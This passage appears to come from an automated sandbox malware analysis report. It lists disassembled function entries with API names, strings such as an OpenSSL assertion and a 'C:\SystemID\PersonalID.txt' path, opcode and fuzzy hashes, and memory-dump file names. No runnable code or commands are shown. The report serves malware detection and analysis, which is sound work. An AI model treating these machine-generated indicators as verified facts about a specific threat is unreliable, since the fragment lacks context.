                Yara matches
                Similarity
                • API ID: _fputws$CreateDirectory
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2590308727-54166481
                • Opcode ID: f3c4cccd2fdfb0a1f5c5730547825dc06ecbeefcb3bb1e5a716d7bbb17428844
                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                • Opcode Fuzzy Hash: f3c4cccd2fdfb0a1f5c5730547825dc06ecbeefcb3bb1e5a716d7bbb17428844
                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                APIs
                Strings
                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt
                • String ID: Assertion failed: %s, file %s, line %d
                • API String ID: 3494438863-969893948
                • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                APIs
                • _memset.LIBCMT ref: 00480686
                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                Strings
                • .\crypto\evp\digest.c, xrefs: 00480638
                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset_raise
                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                • API String ID: 1484197835-3867593797
                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99